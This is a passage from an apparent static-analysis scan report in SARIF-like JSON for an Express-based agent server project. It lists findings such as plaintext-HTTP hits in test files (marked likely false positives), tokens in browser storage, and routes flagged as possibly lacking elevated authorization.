path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/message-router-cross-machine.test.ts"}, "region": {"startLine": 112}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14229, "scanner": "repobility", "fingerprint": "37e2c3416343cff049c6240ae1b7a4dc", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 516}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14228, "scanner": "repobility", "fingerprint": "991bfd9e25f416e60f80f443a882736e", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 99}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14227, "scanner": "repobility", "fingerprint": "598620cf3107c4db455e4bdc01464253", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ExecutionJournal.test.ts"}, "region": {"startLine": 87}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14226, "scanner": "repobility", "fingerprint": "96b7189e503aa4f8f6348f983779b624", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/agent-token-manager.test.ts"}, "region": {"startLine": 223}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14225, "scanner": "repobility", "fingerprint": "6b09e46aaa2748cd534a79dfaf15e1e9", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/DiscoverySecurity.test.ts"}, "region": {"startLine": 253}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14224, "scanner": "repobility", "fingerprint": "68bd42fb9037c6ce767f48324d09aac8", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/CoherenceGate.test.ts"}, "region": {"startLine": 535}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14223, "scanner": "repobility", "fingerprint": "35dd726ace196cb1a1a81b63f9e3f1a4", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 390}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14222, "scanner": "repobility", "fingerprint": "2cc14ec357fdda88bb96b0d544f2c3ba", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 381}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14221, "scanner": "repobility", "fingerprint": "80424dda1b85932ed41e736f7475a65d", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 374}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14220, "scanner": "repobility", "fingerprint": "d2c5bb8ddc0c077cd03205ce0f73d413", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 368}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14219, "scanner": "repobility", "fingerprint": "4009bc25320265669d0a038148501c98", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 362}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14218, "scanner": "repobility", "fingerprint": "d71eadbda3c42992f0c627bbe61ec9ec", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-sync-transport.test.ts"}, "region": {"startLine": 62}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14217, "scanner": "repobility", "fingerprint": "6d7bd8c8f38466773d199ae76c575184", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/message-router.test.ts"}, "region": {"startLine": 346}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14216, "scanner": "repobility", "fingerprint": "cf03462f21df3d57bf9edcf274866b7a", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/message-router.test.ts"}, "region": {"startLine": 315}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14215, "scanner": "repobility", "fingerprint": "7251cbcd76c8c16d1ecf3b82d55b238c", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/message-router.test.ts"}, "region": {"startLine": 280}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14214, "scanner": "repobility", "fingerprint": "1af20df9fd97f84aa76dbc2dd739dd14", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/messaging-types.test.ts"}, "region": {"startLine": 358}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14213, "scanner": "repobility", "fingerprint": "fbc80850bbbaff034c3d0ee4ab853673", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/threadline/A2AIntegration.test.ts"}, "region": {"startLine": 659}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14212, "scanner": "repobility", "fingerprint": "bb66cd77fcc30f493da75e0e7d8b113c", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/execution-journal-lifecycle.test.ts"}, "region": {"startLine": 210}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14211, "scanner": "repobility", "fingerprint": "d2ecc9ec4e393771e2f187ae792ff549", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/execution-journal-lifecycle.test.ts"}, "region": {"startLine": 177}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14210, "scanner": "repobility", "fingerprint": "c67aaa28483eb43ee26d5a5e573e5aea", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/execution-journal-lifecycle.test.ts"}, "region": {"startLine": 160}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14209, "scanner": "repobility", "fingerprint": "f8c0fe5c8ea5ce1d8ef903b959180b9f", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/execution-journal-lifecycle.test.ts"}, "region": {"startLine": 123}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14208, "scanner": "repobility", "fingerprint": "87f7ac4f4aff3395d817591ea26c0db3", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/messaging-routes.test.ts"}, "region": {"startLine": 393}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14207, "scanner": "repobility", "fingerprint": "d8baa494526b3b50171e4876ebfc2c08", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/messaging-routes.test.ts"}, "region": {"startLine": 364}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14206, "scanner": "repobility", "fingerprint": "d8c485e11681de4e924a41e86afdc8b2", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/messaging-routes.test.ts"}, "region": {"startLine": 326}}}]}, {"ruleId": "CRYP001", "level": "warning", "message": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "properties": {"repobilityId": 14205, "scanner": "repobility", "fingerprint": "e65043d720f852d608262d7f3cbfa06d", "category": "crypto", "severity": "medium", "confidence": 0.45, "triageState": "open", "verdict": "likely_fp", "isResolved": false, "reason": " | [R34-retro auto-suppress: test/fixture path]", "evidence": {"snippet": "http://", "aljefra_cwe": ["CWE-319"], "aljefra_owasp": "A02:2021", "aljefra_pattern_slug": "http-not-https"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/messaging-routes.test.ts"}, "region": {"startLine": 292}}}]}, {"ruleId": "WEB003", "level": "warning", "message": {"text": "Public web service has no security.txt"}, "properties": {"repobilityId": 10614, "scanner": "repobility-web-presence", "fingerprint": "5cd26606c5a53c9f403ff7a92a6917c19cf440a23ce03e2b90e8c493312ef8cd", "category": "quality", "severity": "medium", "confidence": 0.78, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Repository looks like a public web app/API but no security.txt file or route was discovered.", "evidence": {"rule_id": "WEB003", "scanner": "repobility-web-presence", "references": ["https://www.rfc-editor.org/rfc/rfc9116", "https://github.com/Lissy93/web-check"], "correlation_key": "fp|5cd26606c5a53c9f403ff7a92a6917c19cf440a23ce03e2b90e8c493312ef8cd"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".well-known/security.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "JRN003", "level": "warning", "message": {"text": "Frontend API reference is not matched by discovered backend routes"}, "properties": {"repobilityId": 10613, "scanner": "repobility-journey-contract", "fingerprint": "8acdb81a55841a608a3e742b3a69d764426d96bb1350974d06e6724b2cb08efb", "category": "quality", "severity": "medium", "confidence": 0.74, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Same-origin /api path appears in frontend code but no discovered backend endpoint has the same route shape.", "evidence": {"rule_id": "JRN003", "scanner": "repobility-journey-contract", "references": ["https://repobility.com/library/authorization/"], "route_shape": "/api/files", "correlation_key": "fp|8acdb81a55841a608a3e742b3a69d764426d96bb1350974d06e6724b2cb08efb", "backend_endpoint_count": 489}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/PostUpdateMigrator.ts"}, "region": {"startLine": 1604}}}]}, {"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 10612, "scanner": "repobility-journey-contract", "fingerprint": "25b4253f0e32af792d7781bd0be7599e7eca26015ab0ea0725a47d3b3112980d", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|dashboard/index.html|3325|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/index.html"}, "region": {"startLine": 3325}}}]}, {"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 10611, "scanner": "repobility-journey-contract", "fingerprint": "7d3bdeb3baf601926f8beb9d82632cf761ddc57d77488954e2147dc4a52edcb5", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|dashboard/index.html|3305|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/index.html"}, "region": {"startLine": 3305}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: DELETE /semantic/forget/:id."}, "properties": {"repobilityId": 10610, "scanner": "repobility-access-control", "fingerprint": "e48ce4fce10392d514a2a9e3598867d5272c8e84509fb45112d187a6645102a2", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/forget/:id", "method": "DELETE", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2403|cwe-285", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2403}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: POST /backups/:id/restore."}, "properties": {"repobilityId": 10609, "scanner": "repobility-access-control", "fingerprint": "9f3b6510d2ff0c58622d93b00b4b2381c39b6855623b5cc9f6195b2415b2a3f9", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/backups/:id/restore", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2157|cwe-285", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2157}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: PUT /homeostasis/thresholds."}, "properties": {"repobilityId": 10608, "scanner": "repobility-access-control", "fingerprint": "1dae21f1b27d8d3344b62da399f433a1a8cb1de35c217d35b9384e342054e33c", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/homeostasis/thresholds", "method": "PUT", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2011|cwe-285", "identity_targets": ["authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2011}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: POST /homeostasis/reset."}, "properties": {"repobilityId": 10607, "scanner": "repobility-access-control", "fingerprint": "8232341477e3d32f3a6a0e9bc47f7947ac062e525338d98eeb63632ab3c6b09a", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/homeostasis/reset", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2006|cwe-285", "identity_targets": ["authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2006}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: POST /homeostasis/pause."}, "properties": {"repobilityId": 10606, "scanner": "repobility-access-control", "fingerprint": "b7b36403c8b6f84554a8b2ddf40ca1ac0042a927cce8ac9c9a64221c8315865d", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/homeostasis/pause", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2000|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2000}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: POST /reflection/session-start."}, "properties": {"repobilityId": 10605, "scanner": "repobility-access-control", "fingerprint": "99b6452863344e83efe88ba48a2efffd846c0e15c982889db827ae846caba0df", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/reflection/session-start", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|1967|cwe-285", "identity_targets": ["authenticated"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 1967}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: POST /api/handoff/request."}, "properties": {"repobilityId": 10604, "scanner": "repobility-access-control", "fingerprint": "e80f72712877a3de9e609ed59d274b6185ffa2382f2fdacba472e89b33716c72", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/api/handoff/request", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/machineroutes.ts|150|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/machineRoutes.ts"}, "region": {"startLine": 150}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: POST /dashboard/unlock."}, "properties": {"repobilityId": 10603, "scanner": "repobility-access-control", "fingerprint": "9189059f6a2b9f01626c257ddc7058f45a762cd3884216189193d681c9f01250", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/dashboard/unlock", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/agentserver.ts|223|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/AgentServer.ts"}, "region": {"startLine": 223}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: GET /dashboard."}, "properties": {"repobilityId": 10602, "scanner": "repobility-access-control", "fingerprint": "47b50b45f1f23d234f8aeb4bb79320c52c2a6dd90ba8adef54bd0efaf4817cb1", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/dashboard", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/agentserver.ts|207|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/AgentServer.ts"}, "region": {"startLine": 207}}}]}, {"ruleId": "AUC009", "level": "warning", "message": {"text": "[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: POST /moltbridge/profile/approve."}, "properties": {"repobilityId": 10601, "scanner": "repobility-access-control", "fingerprint": "5440235bc0afc8b170bbbd7e6259a9013f64a61a811cae85685d3fc347f3f8eb", "category": "auth", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/moltbridge/profile/approve", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/moltbridge/routes.ts|178|cwe-285", "identity_targets": ["unknown"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/moltbridge/routes.ts"}, "region": {"startLine": 178}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: GET /git/log."}, "properties": {"repobilityId": 10600, "scanner": "repobility-access-control", "fingerprint": "1fad7538b3822adbcddcb0fba8b1ebcd0955d09a1f80e021c56d37067d9297bb", "category": "auth", "severity": "medium", "confidence": 0.66, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/git/log", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2260|cwe-285", "identity_targets": ["unknown", "admin"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2260}}}]}, {"ruleId": "AUC004", "level": "warning", "message": {"text": "[AUC004] Admin route does not show super_admin separation: An administrative route was detected without nearby evidence that platform super_admin access is separated from tenant/application admin access. Endpoint: POST /git/pull."}, "properties": {"repobilityId": 